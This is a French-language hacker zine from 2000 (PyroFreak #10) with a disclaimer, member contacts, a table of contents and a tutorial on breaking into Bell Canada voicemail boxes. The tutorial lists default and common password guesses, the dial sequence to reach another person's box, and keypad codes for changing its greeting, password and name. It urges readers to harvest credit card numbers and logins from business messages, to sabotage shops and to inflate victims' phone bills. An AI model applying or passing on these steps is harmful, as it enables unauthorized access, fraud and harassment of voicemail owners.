                                   








                                  '::-::`
                                   (o o)    	
                               ooO--(_)--Ooo-
        2000(c) tOUT lES dROITS sONT rSERVS  pYROfREAk mAGAZINE
        









-::- Si t'est trop saoul pour marcher!! ben prend ton char!!!!
                                                   *Ca c brillant*


       .----..---'`````'.              
     .`    .`            `.            
     \     \               )    ___ __     _   _     _____     ______
      \     \             /    |      |\  | |\| |\  |     |\  |      |\
       \.-'``'-...-'``'-./     |      ; | | | | | | |     | | ;      | |
       ,                 ,     |   x  | | | ; | | | :     | : |      : |
       :                 :     |      ; : | |_: | | |   x ; | |    x | ;
       ,                 ,     |  ___/ \| |___  | | |  ___| | |_ ____| |
      .;                 ;.    | |\__\.`   \__| | ; | |\ __\|  \______\|
     | ;        .        ; |   |_| |          |_| | |_: | ;\
      \ -._____/ \_____.- /     \_\|           \_\|  \_\|_| |   .10.ten.
       :  \_x.'  \`.x_/  :                               \_\|
        `.    (._.)    .'      xxxxxxx. xxxxxx.  xxxxxx.  xxxxxxx. xxx.  x.
        ( \           / )      xxx.     xxx. xx. xxx.     xxx.  x. xxx. x.
         \ \ ....--. / /       xxxxxx.  xxxxxx.  xxxxxx.  xxxxxxx. xxxxx.
     .)   \ /).---._\ /        xxx.     xxx.  x. xxx.     xxx.  x. xxx. x.
      (.   //        /         xxx.     xxx.  x. xxx.     xxx.  x. xxx.  x.
        ) //`--._.--'          xxx.     xxx.  x. xxxxxx.  xxx.  x. xxx.  x.
        (``
                          								
                                                         Crdit: __2

29 Mars 2000


Vous devez lire ceci avant d'aller plus loin:
__________________________________________________________________________
|********************************DISCLAMER********************************|
|                                                                         |
|Pyrofreakmag (et ses membres) tient  avertir les gens qui vont continuer|
|  lire le texte qui  va  suivre qu' ont n'est aucunement responsables   |
|des actes, et mme des penses qui pourraient tre produites par les     |
|lecteurs de ce zine par rapport  nos articles . Nous tenons  mettre    |
|cela bien au clair. Si vous n'tes pas d'accord avec cette affirmation,  |
|fermez ce texte et effacer le de votre disque dur ou sur tout autres     |
|disques. Vous tes le seul responsable de vos actes.                     |
|Message s'adressant  la GRC: Si un article est dans l'illgalit, seul  |
|son auteur peut-tre tenu responsable et non le groupe PYROFREAK en      |
|entier. Pas de poursuite, c ca que ca veux dire simplement! Donc, vener |
|pas nous faire chier!!!!                                                 |
|                                                                         |
|NB: On considre ce magazine comme tant lgal, si vous pensez qu'il ne  |
|l'est pas, continuer pas  lire ce qui suit!                             |
|                                                                         |
|                                                                         |
|Plusieurs personnes nous on pos cette question: Pourquoi vous faite ce  |  
|Magazine? Heh bien, j'ai la rponse  vous. C'est seulement pour dmon-  |
|trer que certains systmes ou compagnies, sont merdiques par rapport  un|
|sujet en particulier, le but de ce magazine, est seulement de les faire  |
|ragir  la situation, pour qu'ils arrangent leur faille le plus rapide- |
|ment possible. Donc, ont est la pour vous aider les compagnies.          |
|_________________________________________________________________________|
===========================================================================
Comment nous rejoindre?:

	Voici les moyens de rejoindre les membres et COLLABORATEURS (De ce
numro) de Pyrofreak. Pour avoir la liste complte, aller sur le site web 
(www.PyroFreak.org) dans la section membres & cie.

Soit par IRC, sur #PyroFreak, via le serveur undernet. 

---------------------------------------------------------------------------
Soit par e-mail: 

       Pour rejoindre PyroFreak: pyrofreakmag@hotmail.com       


Pour rejoindre le WEBMASTER [-DaRK-]:    webmaster@pyrofreak.org  

                          
Pour rejoindre Neuro:                    neuro@pyrofreak.org 
Pour rejoindre endrix:                   lordendrix@hotmail.com

Pour rejoindre Cyberrider:               cyberride@hotmail.com 
Pour rejoindre [ewoks]:                  ewoks@pyrofreak.org
Pour rejoindre tekrebel:                 tekrebel@vl.videotron.ca 
Pour rejoindre Psykaos:                  shurikenbest@hotmail.com 
Pour rejoindre [G]r4FX:                  DarkM0nk@rocketmail.com 
Pour rejoindre NuCleaR:                  nuclear@pyrofreak.org
Pour rejoindre Pilate:                   pilate@pyrofreak.org
Pour rejoindre Oculair:                  oculair@pyrofreak.org
Pour rejoindre PaToFF:                   patoff22@hotmail.com 
Pour rejoindre LeMarquis:                lemarquiz@yahoo.com  
Pour rejoindre BenCode:                  syst3m@pyrofreak.org
Pour rejoindre Karyu:                    Karyu@pyrofreak.org
Pour rejoindre Vip0|a:                   vipola@pyrofreak.org

Pour rejoindre Svaik:                    svaik@biosys.net
Pour rejoindre Cyberdollar:              cyberdollar@caramail.com
Pour rejoindre Putois:                   asmbeginer@multimania.com
Pour rejoindre Mastermind:               anakin_vador@hotmail.com
Pour rejoindre KAiAPhAS:                 goth.goth@caramail.com
Pour rejoindre zorgon:                   zorgon@sdf.lonestar.org
Pour rejoindre Sabrina:                  sabrina@inorbit.com

                       ++++++++++++++++++++++++++++

---------------------------------------------------------------------------
Venez visiter notre site web: 
- http://www.pyrofreak.org : Le site  t compltemet refait, aller voir ca!

Vous pouvez nous laisser un(e) message/critique ou poser une question sur
notre wwwboard sur le site (Section Contact). GNER VOUS PAS, on a pas
l'habitude de rire des gens:)!

Si vous voulez etre inform des changements sur le site de PyroFreak, des
dates de sortie de magazine, etc... Aller vous abonez a la Mailing List de
PyroFreak sur le site, encore dans la section contact.

___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le    |
|pyrofreakmag@hotmail.com .(Les articles envoys les en .txt ou .rtf SVP!) |
|SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en   |
|page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-|
|tions ou commentaires, envoyez les aussi  pyrofreakmag@hotmail.com .     |
|__________________________________________________________________________|

Sujets D'articles proposs:
-Logs de scan 1-800 ou autres
-Explication de nouveaux type de Vmb ou Pbx
-Critiques de divers programmes se rapportant a l'underground
-Informations intressantes sur les cellulaires ou pagettes (Tatoo)
-Informations intressantes sur un type de fraudage
-Technique de hack particulires
-Anecdote particulire
-Programmation intressante pour L'underground
-Etc, utilisez votre imagination!


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #10
: 
|                          TABLE DES MATIERES 
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __

____________________________________________________________________________
|#   Titre de l'article                                 Auteur de l'article |
|___________________________________________________________________________|
|1-  Intro                                                    | Neuro       |
|2-  Tutorial Sur les Messageries TlRponse de Bell Canada  | Neuro       |
|3-  L'utopie du portscan                                     | LeMarquis   |
|4-  Le SYN flooding                                          | Endrix      |
|5-  Certains code rgionaux de Bell&Cantel                   | Endrix      |
|6-  La GRC introduite par un anonyme                         | LeMarquis   |
|7-  Alladvantage                                             | [ewoks] &   |
|                                                             | Svaik       |
|8-  Frquences (The Recueil)                                 | PaToFF      |
|8-1 Frquences plus ou moins lgal pour les Francais         | Cyberdollar |
|9-  Vb5 Tutorial..                                           | Vip0|a      |
|10- Fabrication d'huile de THC                               | Neuro       |
|11- Les secrets d'Eggdrop enfin dvoils                     | LeMarquis   |
|12- Internet Outdial                                         | LeMarquis   |
|13- Beige Boxing - Que se cache t'il sous les plaques        |             |
|                             FUCK TELECOM (Pour les Franais)| Cyberdollar |
|14- Encryption RSA                                           | Sabrina     |
|15- Autres lments sur l'emetteur tl du #9                | Cyberdollar |
|16- Le PATATOR                                               | Mastermind  |
|17- NetAppGuard                                              | KAiAPhAS    |
|18- Trashing Report                                          | endrix      |
|19- DoS, wtfit (what the fuck is that)?                      | Tekrebel    |
|20- Initiation au C sous linux                               | Putois      |
|21- sCAN pAR eNDRIX                                          | endrix      |
|22- Faire chier un trou du cul  la leet                    | Tekrebel    |
|23- Exploit altavista et Cash bar                            | Cyberrider  |
|24- ISOm \\'aReZ & MP3   (Partie 3)                          | Vip0|a      |
|25- Decryptage des comptes de Cashsurfers                    | zorgon      |
|26- Un peu de tout et de rien mais sourtout de moi           | endrix      |
|27- Les nouvelles en Vrac                                    |             | 
|28- Conclusion                                               | Neuro       |
|_____________________________________________________________|_____________|
NB:Le mag est corriger de facon a liminer les fautes d'orthographe
   grandioses, donc dsoler si y'a des incovnients. (Dpendant des 
   articles). Raison: Sa gruge beaucoup trop de temps.

**********************************************************************
*       Pices Jointes dans le .zip de ce numro de PyroFreak        *
*                                                                    *
* Pyrofreak10*.*:           Le document que vous lisez en ce moment  *
* Exercice1_1.gif:          Image, se rfrer  l'article #9         *
* Exercice1_2.gif:          Image, se rfrer  l'article #9         *
* Exercice1_6.gif:          Image, se rfrer  l'article #9         *
* Exercice1_7.gif:          Image, se rfrer  l'article #9         *
* Exercice1_8.gif:          Image, se rfrer  l'article #9         *
* Image1.gif                Image, se rfrer  l'article #14        *
* Image2.gif                Image, se rfrer  l'article #14        *
* Image3.gif                Image, se rfrer  l'article #14        *
* Image4.gif                Image, se rfrer  l'article #14        *
* pyrobottin.txt:           PyroBottin                               *
* code.pyro:                Code Rgional du Quebec                  *
**********************************************************************

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
: 
| 1-Intro
'.________Email: neuro@pyrofreak.org ______________ ____Par Neuro __ __

	Salut peuple de la terre.
                             Comme vous avez peut-tre pu le constater,
vous lisez prsentement le #10 de PyroFreak. Ce #10 coincide justement
avec notre 1er anniversaire d'existance, depuis le dbut de notre premier
magazine datant de Fvrier 1999. Donc, si vous nous suivez depuis notre
dbut, on est trs reconnaisant  votre gard, ou mme si vous venez juste
de connatre le magazine. Donc, on vous dis un gros MERCI. Un merci aussi
pour les critiques trs abondantes de notre dernier numro (#9). Celui-ci
a t critiqu de faon gnral comme tant un numro de qualit, bref nous
allons voir si cela va se rpt dans ce numro. Aussi, dsoler pour le
retard de ce numro, un manque de temps important en est la cause. Pour
terminer, Bonne lecture!




	
>>-Site Web:  www.PyroFreak.org
    Toujours Updater tres rgulirement, et surtout que le site  t 
    compltement refait! ALLER VOUS INSCRIRE A LA Mailing list, dans la
    section contact. Il y a aussi le PyroBottin qui s'avre assez populaire,
    donc, si vous voulez vous procurer les prochaines versions de celui-ci,
    qui est updater trs rgulirement, et bien vous pouvez vous le procurer
    dans les textes onlines sur le site. J'ai cru bon de joindre la version
    la plus rcente du PyroBottin dans le .zip de ce numro, aller y jeter
    un coup d'oeil. En passant une version francaise (France) serais trs
    pratique, pour les intresss qui se demande quoi faire pour participer
     PyroFreak, voila un bon moyen.


Key PGP pour PyroFreak:
Voici notre key Public:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com>

mQGiBDgw03sRBADUCExTODf2IU4T4aC4FzlT3NysmGX4RsuhcFrP6H2jkSd08jXa
HwMQIBqFPRdSsHcNiypeOm/69okv9qCG6TpCvLQZ24GnlSIwsgYAH9sJ+ONnDD9b
XHGbkVTMQZTxXbr//pbWOtHTQuHF0xp9u1Q4G6ulxSAKUNdKqrJBL7v62QCg/ycI
lllyi2hxvucdG5o03BA02CEEAJ5xfuRZA2MVPN+9oO5blMwXO+0rmoiK14maFgVy
7LB4hg1leOQFf2Nq3FpcrgrkxCvG47panSLTVQaEPZsmk5S5SpDhPxhzR+Hn4bBy
/+va5/NWNEb2DCr7M8NN75Kel7PtGGCKJm6wOzI72N01Trw4rKM5OqCbXoe4YcPO
9DtiBAC8b29F5wUT+Zt0qfPiyhTOMftf7AnclDMYDIk8UoqV0a6GLaDHpjilOjif
1otqX5JARYfCYb8bbwvfFFAz/yqPNX5xpzFChD5QKciZ+IbXdYHi3S1rh0vMgLTp
GwqL1aoNcW06cBK3/TdPwNTZaMxmW7zMEYLoKH/h7yDpXIa3erQtUHlyb2ZyZWFr
IE1hZ2F6aW5lIDxweXJvZnJlYWttYWdAaG90bWFpbC5jb20+iQBMBBARAgAMBQI4
MNN7AgsCAhkBAAoJEJVPLe3+WRwP15IAn1o1cstpxi5uAFk1UQ8PmzvvokZfAKD7
S1ZzoBO/fFf5QIPEY2+b3xTPzrkCDQQ4MNN8EAgA9kJXtwh/CBdyorrWqULzBej5
UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1
WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue
jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ
I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG
xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC
AggA3CvCaWUTeC9zxao9AoDJJfzUKLhib4nNR1C0+MNTDGeKKKLSQQLOobQKk4Ao
Pr3Jqe/19p2aJYUu9Ma7r5GwK4hiH4sIGMlDJUprD7Nvr7/5WiKX7IQ+NNMk09RJ
TvFp+b5N5t5rQjGUfkRbWrIZcGLpo+qpL4NNimYG1MbTVqEb4GRSZXz0shY9sWu+
W3g/OuSXcIOXxJiXTmICmXIDOWRdACxngF1FBT802wBEOIu/VR9j6DtVpL8+vx+3
tPI6/Spy+ZadRD4+5hComuXTNzUiI0mcvG2WTqcOAJyuvRFm3ky7xzO6MWlie+Zg
hBDENiqy6zRrWYN6mu1NZHZaWYkARgQYEQIABgUCODDTfAAKCRCVTy3t/lkcDx7v
AJ45rAXK/NeWmwezmE+CGMEZYzJoxQCgsOgyc66kWIRJ2K/WIGgOIq4M3wo=
=QSdb
-----END PGP PUBLIC KEY BLOCK-----


News pour PyroFreak #10 -- Les mdias sont fous!

Note de Neuro: Le monde m'ont trouv "sans scrupule" d'accorder un entrevu
               au Journal de Montral et a L'mmission de TV Branch, et 
               bien vous aviez raison, je suis con et j'ai eu tord!
         

Linux Slackware 7 bug report  Par Endrix
============================
	Il y a un problme dans le pppd de linux slackware 7. Sur beaucoup
de machine, il n'est pas fonctionnant alors vous devez aller downloader
un fix sur le serveur ftp.cdrom.com
(ftp://ftp.cdrom.com/pub/linux/slackware-7.0/slakware/n7/tcpip2.tgz)

Merci!
fbasoft@yahoo.com

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++Annonces et Offres+++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


	Si vous distribuez notre magazine sur votre site, ou si vous avez un
lien vers notre site, fate nous le savoir par e-mail:
                        pyrofreakmag@hotmail.com
Ca va nous faire un grand plaisir d'annoncer votre site (Si celui en vaut le
coup) dans le prochain numro de PyroFreak ou sur notre site, qui surement 
fera monter le nombre de visiteurs sur votre site.
NB: J'ai bien dis si le site en vaut le coup.

Cours sur notre Channel Irc #PyroFreak (Undernet)
	J'aimerais soulign que durant le prochain mois, plusieurs cours vont
etre donns sur notre channel IRC, dont soyez y! Ils vont tre annoncs dans
le topic du chanel.

	On recherche des gens qui serais intresss  donner un ou plusieurs
cours sur notre channel, d'un sujet divers traitant de l'underground. Que
ca soit un cours pour montrer une technique de fumage de weed, ou une tech-
nique sur le "piratage" tlphonique, peu importe, autant que ca soit pas
trop du dja vu. Si ya des intresss, venez nous visiter sur notre channel
IRC , #PyroFreak ! (Autant Francais que Quebecois).

PyroFreak recherche de bons codeurs, soit en Win ou en Linux/Unix, donc
si vous tes intress  vous impliquez dans PyroFreak, et que vous avez
de bonnes connaisances en programmation, contacter nous a:
                          pyrofreakmag@hotmail.com 
Et on vous donnera plus d'informations sur le sujet.


	On recherche aussi quelqu'un qui pourrais nous trouver de bons arti-
cles de journaux rcents, si vous voulez un exemple de ce que nous parlons,
aller lire la section Nouvelles en vrac a la fin de ce magazine. 
                           PyroFreakmag@hotmail.com

 
___________________________________________________________________________
___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le    |
|pyrofreakmag@hotmail.com . Ou si vous avez des questions ou commentaires, |
|envoyez les aussi a pyrofreakmag@hotmail.com .                            |
|__________________________________________________________________________|
+-------------------------+ ,   ,      ,     ,     ,      ,      ,     , 
|+-----------------------+|    ,   ,      ,     ,     ,      ,      ,     
||+---------------------+||,   .____. ,   ,     ,    ,   ,       ,    ,   
||||                   ||||  , |   :|         ,       ,      ,      ,     
||||  J'en ai plein    ||||  __|====|__ ||||||  ,        ,      ,      ,  
||||    mon cul de     ||||*  / o  o \  ||||||,   ,  ,        ,    ,      
||||    cette cris     |||| * | -=   |  \====/ ,       ,   ,    ,     ,   
||||    de saison      |||| _U==\__//__. \\//   +---------------------+   
||||      de cul       ||||/ / \\==// \ \ ||  , |+-------------------+|   
||||                   |||| |    o ||  | \||   ,|| !!! PyroFreak !!! ||   
||||                   ||||/|    o ""  |\_|B),  |+-------------------+|   
||||  CALIS D'HIVERS   ||||, \__  --__/   ||  , +---------------------+   
||+---------------------+|| /          \  ||,   ,   ,   ,   ,    ,    ,    
|+-----------------------+||            | ||  ,   ,  ,   ,    ,   ,       
+-------------------------+|            | || ,  ,  ,   ,   ,     ,  ,     
 ------_____---------____---\__________/__||__---------________PsYkAoS  


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 2-Tutorial Sur les Messageries TlRponse de Bell Canada
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Neuro________  ________  neuro@pyrofreak.org ______ ___


Bonjour, 
        le texte qui va suivre sera utile particulirement aux Qubecois,
mais celui-ci peut quand mme tre utile pour toute personnes habitant
l'Amrique Du Nord (Voir plus bas pour plus d'info). Ce document s'adresse
autant pour les dbutants en matire de Phreak que tout autres personnes 
ayant de la connaisance dans le domaine. J'ai essayer de faire un document
le plus complet possible sur le service TlRponse,  vous de voir si c'est
russi. 

Avant de continuer  lire ce document, vous devez lire ceci:

	                    _--AVERTISSEMENT--_
 
Je tiens  avertir les gens qui vont continuer  lire ce texte, Que je suis
en aucun cas, responsable des actes, et mme des penses qui pourraient tre
produites par les lecteurs de ce texte. Je tiens  mettre cela bien au clair.
Si vous n'tes pas d'accord avec cette affirmation arrter de lire ce docu-
ment ds maintenant et effacer le de votre disque dur ou sur tout autres
disques. Vous tes le seul responsable de vos actes. Prener e texte comme
tant seulement  but thorique.



*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 1- Informations gnrales sur le service TlRponse de Bell Canada.  +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

Voici la publicit que Bell Canada fait de son service de TlRponse:

-Ne manquez plus un seul appel. Le service TlRponse prend vos messages
 quand vous utilisez votre tlphone ou Internet ou si vous tes loign 
 du tlphone.

-Ce service prend jusqu' trois messages en mme temps.

-Il est invisible. Vous n'avez plus  vous occuper des bandes ou des
 cbles. Et il ne prend pas de place.

-Il est fiable. Le service TlRponse continue de fonctionner, mme en
 cas de panne d'lectricit. Il enregistre aussi l'heure et la date de
 chaque message.

-Il est pratique. Rcuprez et grez vos messages depuis tout tlphone
  clavier, 24 heures sur 24.
                              
-Conserver jusqu' 25 messages.

-Recevoir des messages atteignant 3 minutes et de les sauvegarder pendant
 7 jours.
 
-Accueillir les appelants avec un message de 30 secondes (Greeting).

-Sauvegarder les messages non couts pendant 21 jours.

-Le service TlRponse Require Oubligatoirement un service Touch-Tone.

                   ********************************
                   *** Paiement  l'utilisation ***
*************************************************************************
**-Envoyer un message  un groupe : jusqu' 5 listes de 15 numros.    **
**                                                                     **
**-Envoyer des messages  d'autres abonns des services TlRponse ou **
** TlRponse Plus, sans que leur tlphone sonne.                    **
**                                                                     **
**-Envoyer 5 messages jusqu' 30 jours d'avance.                       **
**                                                                     **
**-Envoyez des messages  n'importe qui, n'importe quand, n'importe o!**
**                                                                     **
** La Messagerie Universelle est un service payable  l'utilisation.   **
** Des frais sont exigibles pour chaque message que vous envoyez,      **
** faites suivre ou auquel vous rpondez:                              **
**                                                                     **
** -0,15$ par message au Qubec                                        **
** -0,40$ par message  l'extrieur du Qubec ( l'interieur du Canada)**
** -1,50$ par message aux tats-Unis                                   **
** -2,50$ par message Outre-mer                                        **
*************************************************************************
                      *****************************
                      * Abonnement Supplmentaire *
                      *****************************

Centre de messages intgr 

-Regroupez tous vos tlphones dans une seule bote vocale. Vous pouvez 
 relier les tlphones de votre domicile ou de votre bureau, ainsi que
 votre tlphone cellulaire Bell MobilitMC  une seule bote vocale :
 vous n'aurez ainsi plus qu'un seul mot de passe, un seul message d'ac-
 cueil et un seul point de vrification des messages. 

Option Tlavertisseur 

-Avez-vous un tlavertisseur? Votre bote vocale peut appeler automati-
 quement votre tlavertisseur  quand vous avez des nouveaux messages.

Aide pour le service TlRponse: 1-800-361-9844



         *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
         *+ 2- Utilits de ce systme pour nous les Phreakers.  +*
         *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

	videmment qui  une et mme plusieurs utilits  hacker
ce type de systme, sinon j'aurais pas crit ce tutorial.


*+Premire Utilit+*
	
	L'utilit qui va suivre peut jouer un rle trs important lorsque
vous voulez avoir de l'information sur quelqu'un ou sur une entreprise en
particulier. Je vois plus un intret pour un entreprise, mais bon, les 2
peuvent quand mme tre utilent.

Voici des exemples de types de messages qu'on peut retrouver sur un systme
de TlRponse d'entreprise.

-George, Ici Carole, je voulais juste te dire que j'ai
 dpos les 200$ comme prvu dans votre bote  mail 
 cter de votre porte pour les employs, rappel moi au
 XXX-XXXX pour confirmer si ta bien reu le montant.

-George, Ici Carole, voici mon numro de carte de crdit:
 4551XXXXXXXXXXXX XX/XX . Avec cela tu va pouvoir passer
 la commande que je dsirais plus tot, vu que je pars en
 voyage aujourd'hui et que vous tes ferm.

-George, Ici Carole, je voulais juste te dire que j'ai
 trouv une super aubaine pour les sifflets rose au 456
 rue Des rables.

-George, Ici Carole, j'ai trs hte qu'on baise comme des
 btes, je t'aime.  demain.

-George, Ici Carole, je voulais juste te dire que j'ai
 changer la combinaison de l'entrer de l'usine, le nouveau
 est XX-XX-XX. Salut. (a pourais biensr tre un nouveau
 mot de passe du rseau informatique de l'entreprise)

-George, Ici Carole, je voulais te dire que le site Web
 de la compagnie est complt. Donc, si tu veux rajouter
 de l'informations par toi-mme, voici les informations
 ncessaires: Host: XXXXXXXXXX  Login: XXXXX Pass: XXXXX
 Salut.

--George, Ici Carole, je voulais te dire que si tu dsire
 faire des appels intrurbains, bien voici le numro (PBX)
  composer avant ceux-ci: XXXXXXXXXXXXXXX

	Pour ceux qui doute qu'on peut entendre des messages comme ceux-ci
, vous resteriez trs trs surpris. Mme que plusieurs exemples la dedans
me sont dja arriv personnelement. Donc, a peut tre trs utile d'avoir
accs  la Bote Vocale pour ce type d'informations.

	Evidemment les Botes Vocales de rsidence sont beaucoup moins
intressantes. C'est pourquoi que je doute que ca soit intressant de 
les hacker pour esprer avoir de bonnes informations,  moins biensr
que a soit la rsidence d'un Prsident d'une compagnie, ou quelque
chose comme ca.


*+Deuxime Utilit+*

	L'utilit qui va suivre est plus ou moins intressante. Il s'agit
de faire chier le propritaire de la Bote Vocale et du mme coup, faire
chier Bell. Je vous explique le principe avec une petite exemple.

	Vous connaissez un magasin ou il vend des pices d'ordinateurs
beaucoup plus cher que le prix habituel, et cela vous chque. Donc c'est
pourquoi que vous avez envis de revendiquer cela. C'est alors que vous 
dcidez de hacker (Voir plus bas dans ce texte pour avoir le cot pratique)
la Bote Vocale de la compagnie en question. Cela, en changeant le message
d'intro de la Bote Vocale. Quand je parle de message d'intro (Greeting), 
je parle du message que vous entendez lorsque vous appeler sur un rpondeur
qui est souvent du type: "Bonjour, Johanne et Solange sont pas la pour le
moment, laisser votre message aprs le son du timbre sonore.". Donc, quand
vous le changer, vous pouvez en profiter pour faire passer un message du
style:

-Aller magasiner au commerce X  place de celui-ci, si vous voulez
 avoir de meileurs prix. Tel: XXX-XXXX Adresse: XXX Xxxxxxx.

-Vous vous fate crosser  acheter dans le commerce que vous appelez
 en ce moment.

	Pour changer le message d'intro une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-3-1 ) Il ne vous reste plus qu'
suivre les instructions.

	Bref, vous voyez le type de message que je parle. Bon deu-
ximent, pour que vtre message d'intro reste le plus longtemps pos-
sible, vous devez aussi changer le mot de passe de la Bote Vocale.
Donc, pour que le propritaire peuvent reavoir accs  ca Bote Vo-
cale, il devra appeler Bell, pour que ceux-ci remette  zero a Bote
Vocale. Donc, en remettant  zro la Bote Vocale, le propritaire 
de celle-ci perd tous les messages qui pouvaient avoir sur celle-ci.
Autant les archivs que les nouveaux messages. Donc, ca peux le faire
vraiment chier.

	Pour changer le mot de passe une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-2-1 ) Il ne vous reste plus qu'
suivre les instructions.

	Troisime chose  faire, mais qui n'est pas ncessaire, est de
changer le nom de l'usager de la box. Pourquoi? Et bien je vous explique
cela. Quand le propritaire de la Bote Vocale va se rendre compte que 
son message d'intro  t modifier de faon  lui faire perdre de l'argent
ou  lui nuire, il va se grouiller le cul pour aller le remodifier.
Donc, quand il va faire '*98' de son tlphone pour accder  a Bote Vocale
et que ca va dire exemple : Bonjour "Mr. Du con", entrer votre mot de passe.
Quand ca va faire 3 echecs infructueux, y va virer fou en cris avec Mr. Du 
con.


	Pour changer le nom d'usag une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-3-2 ) Il ne vous reste plus qu'
suivre les instructions.




*+Troisime Utilit+*

	Il s'agit de faire chier une personne en particulier, ou une entre-
prise de faon  faire monter ca facture  la fin du mois. Vous allez me dire
comment?. Heh bien, rien de plus simple. Je sais pas si vous avez remarquer
qu'au dbut de ce tutorial l'entte *Paiement  l'utilisation*. Donc, si vous
passer 15 messages outre-mer  2,50$ chacun, ca commence a faire pas mal chier.
Mais biensr, si vous exagrer sur le montant, Bell va se douter que la personne
dit la vrit quand elle dit qu'elle n'a pas fais ces Frais. Donc soyez tout
de mme rsonnable.



       *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
       *+ 3- Comment hacker le systeme TlRponse de Bell Canada   +*
       *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*


             3-a)*-*Comment accder au service TlRponse: *-*

*-A partir de votre domicile:

1-Composez *98
2-Vous entendrez votre nom ou numro prenregistr
3-Composez votre mot de passe


*-A partir de l'extrieur vers la Bote Vocale du Numro Compos

1-Composez votre numro de tlphone
2-Appuyer sur 9 des le dbut de votre message d'accueil
5-Composez votre mot de passe suivi du #


*-A partir de l'extrieur vers n'importe quel Bote Vocale Tlrponse, il 
  faut juste accder au message d'accueil d'une Bote Vocale TlRponse.

1-Composez votre numro de tlphone
2-appuyer sur * des le dbut de votre message d'accueil
3-Ensuite 1 pour Francais ou 2 pour Anglais
4-Appuyer sur #
5-Composer le numro de tlphone ou la Bote Vocale se situe avec 
  le code rgional (XXX-XXX-XXXX)
5-Composez votre mot de passe suivi du #


                            ***********************
                                ***************
                                   *********



                     3-b)*-*Mot de passe par dfaut*-*
 

	Lorsque vous activez une Messagerie Tlrponse de Bell Canada.
Celle-ci est assign par un mot de passe par dfaut, qui est du mme type
sur tout les TlRponse  leur dmarage.

Exemple:

Le numro de tlphone ou le service de TlRponse est install est:
1-514-254-6767 , et bien le password dans ce cas-ci sera: 2546767
Donc, pour les gens un peu moins vite, voici un deuxime exemple:)
Tel: 1-819-435-4832  Mot de passe: 4354832
C'est pas plus compliqu que ca.


	Passons maintenant  un tape trs importante, il s'agit des
mots de passe par dfaut les plus utiliss. Parce que, comme vous vous en
doutez surement, c'est assez rare que l'usager de la Bote Vocale laisse
le meme password qu' l'origine, vu que Bell les incitent  changer le
mot de passe quand il accde pour la premire fois  leur Bote Vocale.
Donc voici les mots de passe par dfaut, qui sont comme tant trs trs
populaire. J'estime qu'avec ceux-ci vous pouvez hacker 30-40% des systmes
(En ce jour du 6 Janvier 2000), parce qu'aprs la sortie de ce texte,
Bell va surement esssayer de contrer le probleme en incitant d'avantage
sur un mot de passe plus scuritaire. Donc voici les mots de passe  
essayer en ordre. 

Exemple: Le numro de tlphone de la Bote Vocale est: 1-514-329-4363

Password Par dfaut:
4363
3294363
1234
94363
12345
01234
0000
9999
5143294363


Les mots de passe doivent tre situ entre 4 et 15 chiffres pour le
service TlRponse.

Aprs 3 tentatives d'accs au service TlRponse infructueux, le service
te dconnecte. 

Ce qui est bien avec le service TlRponse, c'est que si vous avec 3 echecs
de suite avec le mot de passe, et bien l'oprateur ne le sera jamais. C'est
pas comme les systemes (Audix, Message Center et cie) qui aprs 3 echecs pour
trouver le bon mot de passe, envois un message a l'oprateur dans sa Bote 
Vocale lui disant que la Bote Vocale  eu 3 tentatives de Mot de Passe 
invalide.

                            ***********************
                                ***************
                                   *********


3-c)*-*Les tapes pour accder au menu  partir d'une autre Bote Vocale*-*

-Vous composez le numro de tlphone qui  une Bote Vocale TlRponse,
 mais pas  ncessairement celle que vous voulez hacker.

-Attender que le message d'intro dbute, et appuyer sur *

 "Bienvenue au service TlRponse de Bell Canada"
 "Si vous dsirez des instructions vocale en franais, veuiller appuyer
  sur 1.."

-Appuyer sur 1

 "Si vous disposer d'une bote vocale dans ce systeme, appuyer sur le #
 et composer votre numro de tlphone, prcd de l'indicatif rgional
 ou encore, composer  nouveau les 10 chiffres du # de la personne que vous 
 dsirer appeler"

-Appuyer sur #

 "Le numro de la Bote Vocale svp"

-Composer le numro de tlphone avec le code rgional de la Bote Vocale 
 hacker.

 "Veuiller composer votre mot de passe"

-Composer le mot de passe suivi du #

*** ce point, vous avez accs au Menu***


                            ***********************
                                ***************
